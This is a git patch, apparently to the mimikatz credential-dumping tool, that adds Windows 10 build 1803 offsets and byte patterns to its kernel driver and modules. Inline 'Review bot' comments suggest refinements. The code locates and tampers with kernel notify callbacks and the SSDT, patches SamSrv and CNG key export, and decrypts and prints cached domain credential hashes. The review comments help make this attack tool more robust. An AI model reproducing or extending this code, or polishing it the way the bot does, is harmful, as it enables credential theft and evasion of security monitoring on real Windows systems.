From 9cd7e2dba758556d971a6e80c840084d82a69bf4 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Thu, 22 Mar 2018 03:56:19 +0100 Subject: [PATCH] [new] mimikatz & mimidrv support for Windows 10 build 1803 (17623) x64 [internal] structures for SAM cache --- inc/globals.h | 2 + mimidrv/globals.h | 3 +- mimidrv/kkll_m_filters.c | 2 + mimidrv/kkll_m_notify.c | 9 +++- mimidrv/kkll_m_process.c | 4 +- mimidrv/kkll_m_ssdt.c | 11 +++- mimidrv/mimidrv.c | 7 ++- mimikatz/modules/crypto/kuhl_m_crypto_patch.c | 1 + mimikatz/modules/kuhl_m_lsadump.c | 53 +++++++++++++++--- mimikatz/modules/kuhl_m_lsadump.h | 23 +++++++- mimikatz/modules/kuhl_m_standard.c | 54 ++++++++++++++++++- mimikatz/modules/kuhl_m_standard.h | 9 ++-- mimikatz/modules/kuhl_m_vault.c | 2 + .../modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 2 + 14 files changed, 161 insertions(+), 21 deletions(-) diff --git a/inc/globals.h b/inc/globals.h index e87b5d5..d6f968c 100644 --- a/inc/globals.h +++ b/inc/globals.h @@ -95,6 +95,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU #define KULL_M_WIN_BUILD_10_1607 14393 #define KULL_M_WIN_BUILD_10_1703 15063 #define KULL_M_WIN_BUILD_10_1709 16299 +#define KULL_M_WIN_BUILD_10_1803 17623 + #define KULL_M_WIN_MIN_BUILD_XP 2500 #define KULL_M_WIN_MIN_BUILD_2K3 3000 diff --git a/mimidrv/globals.h b/mimidrv/globals.h index 7d34797..4bfb25f 100644 --- a/mimidrv/globals.h +++ b/mimidrv/globals.h @@ -39,7 +39,8 @@ typedef enum _KIWI_OS_INDEX { KiwiOsIndex_10_1607 = 9, KiwiOsIndex_10_1703 = 10, KiwiOsIndex_10_1709 = 11, - KiwiOsIndex_MAX = 12, + KiwiOsIndex_10_1803 = 12, + KiwiOsIndex_MAX = 13, } KIWI_OS_INDEX, *PKIWI_OS_INDEX; #ifdef _M_IX86 diff --git a/mimidrv/kkll_m_filters.c b/mimidrv/kkll_m_filters.c index efa7dc2..7a66253 100644 --- a/mimidrv/kkll_m_filters.c +++ b/mimidrv/kkll_m_filters.c 
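Review bot: `KiwiOsIndex_MAX` is the row count of positional tables such as `MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX]` (mimidrv/kkll_m_filters.c) and `EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX]` (mimidrv/kkll_m_process.c), so bumping it to 13 with `KiwiOsIndex_10_1803 = 12` is correct only because each such table gains a row in the same commit; a table left behind would silently zero-fill its last row. Designated initializers, e.g. `[KiwiOsIndex_10_1803] = {0x004c, 0x000c, 0x0010, 0x0040},`, would bind each row to its index and make a missing one visible. In inc/globals.h the new `KULL_M_WIN_BUILD_10_1803` is pinned to 17623, the build the subject line says this was developed against and which appears to be a pre-release number; a comment such as `// preview build, revisit at RTM` would record that, since the same literal is repeated in `getWindowsIndex` (mimidrv/mimidrv.c) both as the `case` and as the `> 17623` catch-all.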
@@ -21,6 +21,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] = /* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040}, /* 10_1703*/{0x004c, 0x000c, 0x0010, 0x0040}, /* 10_1709*/{0x004c, 0x000c, 0x0010, 0x0040}, +/* 10_1803*/{0x004c, 0x000c, 0x0010, 0x0040}, #else /* UNK */ {0}, /* XP */ {0}, @@ -34,6 +35,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] = /* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060}, /* 10_1703*/{0x0090, 0x0018, 0x0020, 0x0060}, /* 10_1709*/{0x0090, 0x0018, 0x0020, 0x0060}, +/* 10_1803*/{0x0090, 0x0018, 0x0020, 0x0060}, #endif }; diff --git a/mimidrv/kkll_m_notify.c b/mimidrv/kkll_m_notify.c index 510a6c5..169e21b 100644 --- a/mimidrv/kkll_m_notify.c +++ b/mimidrv/kkll_m_notify.c @@ -13,7 +13,7 @@ PKKLL_M_MEMORY_OFFSETS pCmpCallBackOffsets = NULL; POBJECT_DIRECTORY *ObpTypeDirectoryObject = NULL; PKKLL_M_MEMORY_OFFSETS pObpTypeDirectoryObjectOffsets = NULL; -PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL; +//PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL; POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL; POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL; 
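Review bot: The `pPsSetCreateProcessNotifyRoutineEx` definition in mimidrv/kkll_m_notify.c is commented out instead of removed, leaving a dead `//PPSSETCREATEPROCESSNOTIFYROUTINEEX ...` line among live globals; if nothing uses it any more, delete it, and if a header still declares it `extern` or another translation unit references it, the break only shows up at link time, so that declaration should go in the same change. Nothing in the hunk says why the pointer became unnecessary; one sentence in the commit message would do. The 1803 rows added to `MF_OffSetTable` in the two hunks above duplicate the 1709 rows exactly, which is fine but worth a `/* same as 1709 */` marker so a later offset change is not applied to one row and not the other.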
@@ -32,6 +32,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
  {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
  {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
  {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
+ {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
 };
 UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
 UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
@@ -42,7 +43,7 @@ UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6,
 UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 UCHAR PTRN_W10_1703_Process[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
-UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b, 0xd6, 0xe8};
+UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b/*, 0xd6, 0xe8*/};
 KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
  {KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
  {KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
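Review bot: `PTRN_W10_1709_Process` loses its last two bytes by commenting them out (`0x48, 0x8b/*, 0xd6, 0xe8*/}`), presumably so the 1803 row of `ProcessReferences` in the next hunk can share it, but the code does not say so and a reader will take the stray `/* ... */` inside the initializer for an accident. Either rename the array to cover both builds or add a comment on the line, e.g. `// shortened: shared by the 1709 and 1803 rows of ProcessReferences`, and delete the commented-out bytes rather than leaving them in the initializer.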
@@ -54,6 +55,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
  {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
  {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}},
  {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process}, L"PsSetCreateProcessNotifyRoutine", L"RtlGetSystemBootStatus", { -4, 64}},
+ {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process}, L"PsSetCreateProcessNotifyRoutine", L"EtwEnableTrace", { -4, 64}},
 };
 UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
 UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
@@ -72,6 +74,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
  {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"SeRegisterLogonSessionTerminatedRoutineEx", { -4, 64}},
  {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
  {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
+ {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
 };
 UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
 UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
@@ -90,6 +93,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
  {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 25, 0x010, 0x070, 0x0c8}},
  {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}},
  {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}},
+ {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}},
 };
 UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
 UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
@@ -108,6 +112,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
  {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
  {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
  {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
+ {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
 };
 #elif defined _M_IX86
 UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
diff --git a/mimidrv/kkll_m_process.c b/mimidrv/kkll_m_process.c
index 4160a83..f195638 100644
--- a/mimidrv/kkll_m_process.c
+++ b/mimidrv/kkll_m_process.c
@@ -19,7 +19,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] = /* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc}, /* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4}, /* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, -/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, // +/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, +/* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, #else /* UNK */ {0}, /* XP */ {0}, @@ -33,6 +34,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] = /* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0}, /* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8}, /* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8}, +/* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8}, #endif }; diff --git a/mimidrv/kkll_m_ssdt.c b/mimidrv/kkll_m_ssdt.c index e6b44a3..3ff6d3c 100644 --- a/mimidrv/kkll_m_ssdt.c +++ b/mimidrv/kkll_m_ssdt.c @@ -44,6 +44,7 @@ NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer) #ifdef _M_X64 const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83}; +const UCHAR PTRN_W1803_Ke[] = {0xd3, 0x41, 0x3b, 0x44, 0x3a, 0x10, 0x0f, 0x83}; const LONG OFFS_WNO8_Ke = -24;//-19; const LONG OFFS_WIN8_Ke = -21;//-16; const LONG OFFS_WIN10A_Ke = -38;//-16; 
@@ -53,7 +54,15 @@ NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable() if(KeServiceDescriptorTable) status = STATUS_SUCCESS; else - status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke); + { + status = kkll_m_memory_genericPointerSearch( + (PUCHAR *) &KeServiceDescriptorTable, + ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), + ((PUCHAR) ZwUnloadKey) + (19 * PAGE_SIZE), + (KiwiOsIndex < KiwiOsIndex_10_1803) ? PTRN_WALL_Ke : PTRN_W1803_Ke, + (KiwiOsIndex < KiwiOsIndex_10_1803) ? sizeof(PTRN_WALL_Ke) : sizeof(PTRN_W1803_Ke), + (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke); + } return status; } #endif \ No newline at end of file diff --git a/mimidrv/mimidrv.c b/mimidrv/mimidrv.c index a57473b..c704f4c 100644 --- a/mimidrv/mimidrv.c +++ b/mimidrv/mimidrv.c @@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR KIWI_OS_INDEX getWindowsIndex() { - if(*NtBuildNumber > 16299) // forever 10 =) - return KiwiOsIndex_10_1709; + if(*NtBuildNumber > 17623) // forever 10 =) + return KiwiOsIndex_10_1803; switch(*NtBuildNumber) { @@ -210,6 +210,9 @@ KIWI_OS_INDEX getWindowsIndex() case 16299: return KiwiOsIndex_10_1709; break; + case 17623: + return KiwiOsIndex_10_1803; + break; default: return KiwiOsIndex_UNK; } diff --git a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c index 794f811..7c8a7ae 100644 --- a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c +++ b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c 
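Review bot: The upper bound of the window passed to `kkll_m_memory_genericPointerSearch` moves from `16 * PAGE_SIZE` to `19 * PAGE_SIZE` for every build, not just 1803, and the rewritten block does not say why; if only 1803 needs the wider range, select it with the same test as the pattern, `((PUCHAR) ZwUnloadKey) + (((KiwiOsIndex < KiwiOsIndex_10_1803) ? 16 : 19) * PAGE_SIZE),`, otherwise a comment on the new constant so the next reader does not "restore" 16. `KiwiOsIndex < KiwiOsIndex_10_1803` is evaluated twice, once for the pattern and once for its `sizeof`, which lets the two drift apart on the next edit; a local `const UCHAR *pattern` with a matching `SIZE_T cbPattern` (or a small `{pattern, size}` struct) keeps them paired. The body of `kkll_m_ssdt_getKeServiceDescriptorTable` starts outside the hunk.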
@@ -92,6 +92,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = { {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_W10_1703_SPCryptExportKey),PTRN_W10_1703_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, + {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, }; #elif defined _M_IX86 BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75}; diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c index b3dd0ab..865c9cf 100644 --- a/mimikatz/modules/kuhl_m_lsadump.c +++ b/mimikatz/modules/kuhl_m_lsadump.c @@ -695,6 +695,7 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, BYTE digest[MD5_DIGEST_LENGTH]; CRYPTO_BUFFER data, key = {MD5_DIGEST_LENGTH, MD5_DIGEST_LENGTH, digest}; LSA_UNICODE_STRING usr; + if(kuhl_m_lsadump_decryptSecret(hSecurity, hPolicyBase, L"Secrets\\NL$KM\\CurrVal", lsaKeysStream, lsaKeyUnique, &pNLKM, &szNLKM)) { 
@@ -742,8 +743,8 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, usr.Length = usr.MaximumLength = pMsCacheEntry->szUserName; usr.Buffer = (PWSTR) ((PBYTE) pMsCacheEntry->enc_data + sizeof(MSCACHE_DATA)); - if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1) - kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1, pCacheData->hProv, pCacheData->keySpec); + if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC) + kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC, pCacheData->hProv, pCacheData->keySpec); if(pCacheData && pCacheData->username && (_wcsnicmp(pCacheData->username, usr.Buffer, usr.Length / sizeof(wchar_t)) == 0)) { 
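Review bot: `szSC` is a DWORD read from the cache entry's `MSCACHE_DATA`, and the new condition only checks that it is non-zero before computing `pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC)`; if `s1` is the size of the decrypted blob (it is declared outside the hunk), a `szSC` larger than `s1` wraps the subtraction and the pointer handed to `kuhl_m_lsadump_decryptSCCache` lands outside the buffer. If the entry may come from an offline hive file, add the bound to the same condition, `... && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC <= s1`, and consider a local `PMSCACHE_DATA pData = (PMSCACHE_DATA) pMsCacheEntry->enc_data;` since the cast now appears four times on two lines. The first `if` also dereferences `pCacheData->hProv` unconditionally while the very next `if` tests `pCacheData &&` first, so one of the two is wrong: either `pCacheData` cannot be NULL here and the second test is dead, or the new line needs the same guard. `kuhl_m_lsadump_getNLKMSecretAndCache` begins and ends outside the hunk.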
@@ -818,10 +819,49 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, void kuhl_m_lsadump_printMsCache(PMSCACHE_ENTRY entry, CHAR version) { - kprintf(L"User : %.*s\\%.*s\n", - entry->szDomainName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA) + entry->szUserName + 2 * ((entry->szUserName / sizeof(wchar_t)) % 2), - entry->szUserName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA) - ); + //DWORD i; + MSCACHE_ENTRY_PTR ptr; + ptr.UserName.Buffer = (PWSTR) ((PBYTE) entry->enc_data + sizeof(MSCACHE_DATA)); + ptr.UserName.Length = ptr.UserName.MaximumLength = entry->szUserName; + ptr.Domain.Buffer = (PWSTR) ((PBYTE) ptr.UserName.Buffer + SIZE_ALIGN(entry->szUserName, 4)); + ptr.Domain.Length = ptr.Domain.MaximumLength = entry->szDomainName; + //ptr.DnsDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Domain.Buffer + SIZE_ALIGN(entry->szDomainName, 4)); + //ptr.DnsDomainName.Length = ptr.DnsDomainName.MaximumLength = entry->szDnsDomainName; + //ptr.Upn.Buffer = (PWSTR) ((PBYTE) ptr.DnsDomainName.Buffer + SIZE_ALIGN(entry->szDnsDomainName, 4)); + //ptr.Upn.Length = ptr.Upn.MaximumLength = entry->szupn; + //ptr.EffectiveName.Buffer = (PWSTR) ((PBYTE) ptr.Upn.Buffer + SIZE_ALIGN(entry->szupn, 4)); + //ptr.EffectiveName.Length = ptr.EffectiveName.MaximumLength = entry->szEffectiveName; + //ptr.FullName.Buffer = (PWSTR) ((PBYTE) ptr.EffectiveName.Buffer + SIZE_ALIGN(entry->szEffectiveName, 4)); + //ptr.FullName.Length = ptr.FullName.MaximumLength = entry->szFullName; + //ptr.LogonScript.Buffer = (PWSTR) ((PBYTE) ptr.FullName.Buffer + SIZE_ALIGN(entry->szFullName, 4)); + //ptr.LogonScript.Length = ptr.LogonScript.MaximumLength = entry->szlogonScript; + //ptr.ProfilePath.Buffer = (PWSTR) ((PBYTE) ptr.LogonScript.Buffer + SIZE_ALIGN(entry->szlogonScript, 4)); + //ptr.ProfilePath.Length = ptr.ProfilePath.MaximumLength = entry->szprofilePath; + //ptr.HomeDirectory.Buffer = (PWSTR) ((PBYTE) ptr.ProfilePath.Buffer + 
SIZE_ALIGN(entry->szprofilePath, 4)); + //ptr.HomeDirectory.Length = ptr.HomeDirectory.MaximumLength = entry->szhomeDirectory; + //ptr.HomeDirectoryDrive.Buffer = (PWSTR) ((PBYTE) ptr.HomeDirectory.Buffer + SIZE_ALIGN(entry->szhomeDirectory, 4)); + //ptr.HomeDirectoryDrive.Length = ptr.HomeDirectoryDrive.MaximumLength = entry->szhomeDirectoryDrive; + //ptr.Groups = (PGROUP_MEMBERSHIP) ((PBYTE) ptr.HomeDirectoryDrive.Buffer + SIZE_ALIGN(entry->szhomeDirectoryDrive, 4)); + //ptr.LogonDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Groups + SIZE_ALIGN(entry->groupCount * sizeof(GROUP_MEMBERSHIP), 4)); + //ptr.LogonDomainName.Length = ptr.LogonDomainName.MaximumLength = entry->szlogonDomainName; + + //kprintf(L"UserName : %wZ\n", &ptr.UserName); + //kprintf(L"Domain : %wZ\n", &ptr.Domain); + //kprintf(L"DnsDomainName: %wZ\n", &ptr.DnsDomainName); + //kprintf(L"Upn : %wZ\n", &ptr.Upn); + //kprintf(L"EffectiveName: %wZ\n", &ptr.EffectiveName); + //kprintf(L"FullName : %wZ\n", &ptr.FullName); + //kprintf(L"LogonScript : %wZ\n", &ptr.LogonScript); + //kprintf(L"ProfilePath : %wZ\n", &ptr.ProfilePath); + //kprintf(L"HomeDirectory: %wZ\n", &ptr.HomeDirectory); + //kprintf(L"HomeDirectoryDrive: %wZ\n", &ptr.HomeDirectoryDrive); + //kprintf(L"Groups :"); + //for(i = 0; i < entry->groupCount; i++) + // kprintf(L" %u", ptr.Groups[i].RelativeId); + //kprintf(L"\n"); + //kprintf(L"LogonDomainName: %wZ\n", &ptr.LogonDomainName); + //kprintf(L"sidCount: %u\n", entry->sidCount); + kprintf(L"User : %wZ\\%wZ\n", &ptr.Domain, &ptr.UserName); kprintf(L"MsCacheV%c : ", version); kull_m_string_wprintf_hex(((PMSCACHE_DATA) entry->enc_data)->mshashdata, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n"); } 
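Review bot: Roughly forty of the lines added to `kuhl_m_lsadump_printMsCache` are commented-out code (`//DWORD i;`, the `ptr.DnsDomainName` through `ptr.LogonDomainName` setup and the `//kprintf` dump), which matches the "[internal]" tag of the commit but leaves the function hard to read and impossible to compile-check; put the unfinished part under `#if 0` / `#endif` with a one-line reason, or park it in a separate `static` helper that is not yet called. The two live computations place `ptr.Domain.Buffer` at `ptr.UserName.Buffer + SIZE_ALIGN(entry->szUserName, 4)` and then `%wZ` reads both strings without checking that `szUserName` and `szDomainName` lie inside the entry's data, the same as the replaced code; if the entry may come from an offline hive file that bound is worth a check before printing.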
@@ -1124,6 +1164,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
  {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-24}},
  {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-21}},
  {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-19}},
+ {KULL_M_WIN_BUILD_10_1709, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-21}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WALL_SampQueryInformationUserInternal[] = {0xc6, 0x40, 0x22, 0x00, 0x8b};
diff --git a/mimikatz/modules/kuhl_m_lsadump.h b/mimikatz/modules/kuhl_m_lsadump.h
index c1620bb..a751158 100644
--- a/mimikatz/modules/kuhl_m_lsadump.h
+++ b/mimikatz/modules/kuhl_m_lsadump.h
@@ -266,7 +266,7 @@ typedef struct _MSCACHE_ENTRY {
  WORD szUserName;
  WORD szDomainName;
  WORD szEffectiveName;
- WORD szfullName;
+ WORD szFullName;
  WORD szlogonScript;
  WORD szprofilePath;
  WORD szhomeDirectory;
